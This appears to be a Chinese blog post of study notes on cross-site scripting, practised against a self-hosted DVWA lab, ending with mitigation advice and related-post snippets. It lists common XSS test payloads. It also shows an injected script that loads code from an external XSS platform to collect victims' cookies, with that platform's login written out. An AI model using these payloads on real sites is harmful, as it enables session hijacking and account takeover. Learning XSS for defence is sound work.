Web安全攻防-----学习笔记(四)之XSS

最新推荐文章于 2022-04-05 22:00:14 发布
最新推荐文章于 2022-04-05 22:00:14 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: xss web 安全 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxcsdn666/article/details/100710693
版权
web 同时被 3 个专栏收录
16 篇文章 0 订阅
订阅专栏
安全
16 篇文章 0 订阅
订阅专栏
xss
1 篇文章 0 订阅
订阅专栏

4.4 XSS基础

跨站脚本(Cross-Site Scripting)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。

允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。

XSS攻击可以分为三种:反射型、存储型、DOM型。

4.4.2 XSS漏洞原理

1. 反射型XSS

反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性

2.存储型XSS

又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。

攻击方式:多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。

例如,恶意攻击者在留言板中加入一下代码。

<script>alert(/You are hacked!/)</script>

3.DOM型XSS

其实是一种特殊类型的反射XSS,是基于文档对象模型的一种漏洞。客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型的XSS漏洞不需要与服务器端交互,它只发生在客户端处理数据的阶段

攻击方式:用户请求经过一个专门设计的URL,它由攻击者提交,而且其中包含XSS代码。服务器的响应不会以任何形式包含攻击者的脚本。当用户的浏览器处理这个响应时,DOM就会处理XSS代码,导致存在XSS漏洞。

4.4.3 反射性XSS攻击

目标为自行搭建的靶机系统:http://192.168.1.180/dvwa/login.php,用户名和密码为admin、password

输入为:

<script>alert("You are hacked!")</script>

结果如下:

4.4.5 储存型XSS攻击

 Name:test

提交内容:同上。。。

4.4.7 DOM型XSS攻击

4.5 XSS进阶

XSS平台地址:http://8320.cn/xss.php

用户名:158_abc 邮箱:qqyx  密码:158_abc

4.5.1 XSS常用语句及编码绕过

常见测试语句有:

  • <script>alert</script>
  • <img src=x οnerrοr=alert(123)>
  • <svg οnlοad=alert(123)>
  • <a href=javascript:alert(123)>

常见的绕过编码有:

  • JS编码
  • HTNL编码
  • URL编码

4.5.2 使用XSS平台测试XSS漏洞

将利用代码插入到存在XSS漏洞的URL后,

</tExtArEa>'"><sCRiPt sRC=http://8320.cn/MIUM></sCrIpT>

即为:

http://192.168.1.180/dvwa/vulnerabilities/xss_r/?name=</tExtArEa>'"><sCRiPt sRC=http://8320.cn/MIUM></sCrIpT>

回到XSS平台,可以看到以及获取了信息,其中包含来源地址、cookie、IP、浏览器等,如果用户处于登录状态,可以修改cookie并进入该用户的账户,如下图:

4.5.3 XSS漏洞修复建议

由于xss漏洞涉及输入和输出两部分,故修复也有2种:

  • 过滤输入的数据,包括单引号、双引号、小于号、大于号、on*等非法字符
  • 对输出到页面的数据进行相应的编码转换,包括HTML实体编码、JavaScript编码等

续:Web安全攻防-----学习笔记(四)之CSRF与CSRF

[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
XSS基础(WEB安全攻防读书笔记)
小英雄颂人头
02-24 265
XSS基础 XSS介绍 跨站脚本简称XSS,跨站脚本或跨站脚本攻击,是一种针对网站应用的安全漏洞应用攻击技术,是代码注入的一种,他允许恶意用户将代码注入网页,其他用户浏览此网页就会受到影响 XSS攻击分为三种: 反射型,存储型和DOM型 XSS原理 反射型XSS 反射型XSS又称非持久性XSS,这种攻击方式具有一次性 攻击方式: 通过电子邮件将包含XSS代码的恶意链接发送给目标用户...
xss防御
weixin_43326436的博客
06-09 818
1.xss防御的总体思路是:对用户的输入(和URL参数) 进行过滤,对输出进行html编码,也就是对用户的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容,然后对动态输出页面的内容进行html编码,使脚本无法在浏览器中执行。 2.对输入的内容进行过滤,可以分为黑名单过滤和白名单过滤,黑名单虽然可以拦截大部分的xss攻击,但是还是存在被绕过的风险,白名单过滤虽然可以基本杜绝xss攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的。 3.对输出进行html编码,就是通过函数,将用
Nginx伪静态参数大于$9解决办法
qq_35649305的博客
04-25 369
问题: &a=$1&b=$2&c=$3&d=$4&e=$5&f=$6&g=$7&h=$8&i=$9&j=$10 Nginx伪静态$9之后就不认了 看到此题后,因为我自己以前并没有做过十个以个参数重写的情况,所以好奇之下测试了一番,果然如此。 思索了一下,恰巧前两天看过一个关于PHP正则替换函数preg_replace()的相关说明,它说正则匹配后,后面调用前面小括号里的数值(称之为逆向引用)时,可以使用的值为0-99,其中0表示
常见的漏洞以及渗透工具使用
莫黎小天
09-14 1267
一、渗透工具 一、sqlmap 1.判断是否存在注入 假设目标注入点是http://192.168.1.104/sql1/Less-1/?id=11 判断命令 sqlmap.py-u http://192.168.1.104/sql1/Less-1/?id=1 还有一种情况,当注入点后面的参数大于等于两个时,需要加双引号,如下所示。 sqlmap.py-u"http://192.168.1.104/sql1/Less-1/?id=1&uid=2" 2.判断文本中的请求是否存在注入 从文件中加载HTT
XSS漏洞
zjdda的博客
05-30 449
简单介绍XSS漏洞的原理、分类、危害以及防御
Web-安全渗透全套教程20XSS跨.zip
05-22
【描述】中的"Web-安全渗透全套教程20XSS跨.zip"暗示了这是一个完整的系列,可能包括多个章节或课程,专门针对XSS跨站脚本的攻防策略进行深入讲解。这份教程可能涵盖了从基础概念、类型、利用方式,到防御措施和实际...
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8236
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Web安全攻防渗透测试实战指南》学习笔记
K1ose的博客
06-17 3932
学习笔记第一章 渗透测试之信息收集第二章第三章 第一章 渗透测试之信息收集 知己知彼,百战不殆 ——《孙子兵法》信息收集: 1. 服务器的配置信息 1. 网站敏感信息 具体细节: 1. 收集域名信息:域名->域名注册信息:DNS服务器信息、注册人信息 方法: 1)Whois查询 i. Whois是一个标准的互联网协议,可用于收集网络注册信息,注册的域名,
XSS漏洞解决方案之一:过滤器
梦想起飞的地方.........
03-12 1万+
XSS漏洞解决方案之一:过滤器 一:web.xml文件  漏洞 --> xssFilter com.baidu.rigel.sandbox.core.filter.XSSFilter xssFilter /* xssFilter com.baidu
XSS 绕过常用语句
Mr.Huang_的博客
09-16 3361
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
如何进行页面编码转换
06-06 1530
用中文进行页面显示,总会遇到这样那样的编码问题,现根据我的经验谈谈编码转换。 如果想把一个JSP页面从一种编码转换到另一种编码,例如从GBK到UTF-8,或者相反,可以采取以下方法。1、一般notepad打开的文档不会自动编码,可以作为转换的中转站;2、新建一个notepad文件,定义编码方式(这就是你要生成的目标文件),例如: 然后保存为*.jsp,*代表你的文件名;3、用有
XML学习
qq1922631820的博客
01-06 294
1.eclipse xml快速注释:Ctrl+shift+c(单手操作) 直接撤销加反撤销!与html的注释一样&lt;!-- --&gt;,不允许放置在文档的第一行。 2.版本1.0,gbk编码,no代表不依赖编码(yes代表不依赖编码) &lt;?xml version="1.0" encoding="utf-8" standalone="no"?&gt; &lt;stus&gt;..
XML中包含非法字符的处理方法
热门推荐
victory08的专栏
08-25 2万+
如果一个xml文件的两个标签之前有" 1、将" < > > 大于号  & & 和  &apos; ' 单引号  " " 双引号 以上5个是在xml协议中预定义好的实体,实体必须以符号"&"开头,以符号";"结尾。 注意: 只有" 2、标签之间的字符串用结尾。
Xss小游戏通关攻略带解释
sirius的博客
08-28 5582
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
Web常见漏洞修复建议
weixin_34236869的博客
04-03 857
一、SQL注入修复建议 1.过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 2.使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中,而是使用占位符实现对数据库的增删改查。 二、XSS修复建议 1.过滤输入的数据,例如:“ ‘ ”,“ “ ”,” < “,” > “,”on*...
渗透相关问题(3)
zjdda的博客
05-30 1168
学习笔记
xss 全编码两次_XSS平台简单使用
weixin_39559804的博客
12-18 272
XSS常用语句及编码绕过XSS常用的测试语句有:alert(1)常见的XSS的绕过编码有JS编码、HTML实体编码和URL编码JS编码JS提供了种字符编码的策略,如下所示。三个八进制数字,如果个数不够,在前面补0,例如“e” 的编码为“\145” ;两个十六进制数字,如果个数不够,在前面补0,例如"e" 的编码为"\x65" ;个十六进制数字,如果个数不够,在前面补0,例如"e" 的编码为“\...
Web安全深度解析:攻防技术与实践
"Web安全学习笔记-Web-Sec Documentation 是一份详尽的Web安全知识库,涵盖从基础知识到深入攻防策略的多个方面。作者Lyle在2021年9月25日发布了该文档的1.0版本。这份文档主要分为七个部分,包括序章、计算机网络与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>